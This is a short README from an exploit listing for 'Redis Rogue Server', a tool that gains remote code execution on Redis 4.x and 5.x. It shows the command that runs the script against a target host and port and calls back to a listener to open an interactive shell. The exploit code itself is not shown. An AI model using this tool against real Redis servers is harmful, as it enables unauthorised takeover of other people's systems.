## https://sploitus.com/exploit?id=1297A77E-4C4C-553E-85D5-D1CA5B8634CD
# Redis Rogue Server
A exploit for Redis 4.x and 5.x RCE, inspired by [Redis post-exploitation](https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf).
## Usage:
Compile .so from .
Copy the .so file to same folder with `redis-rogue-server.py`.
Run the rogue server:
```
python3 redis-rogue-server.py --rhost --rport --lhost --lport
```
The default target port is 6379 and the default vps port is 21000.
And you will get an interactive shell!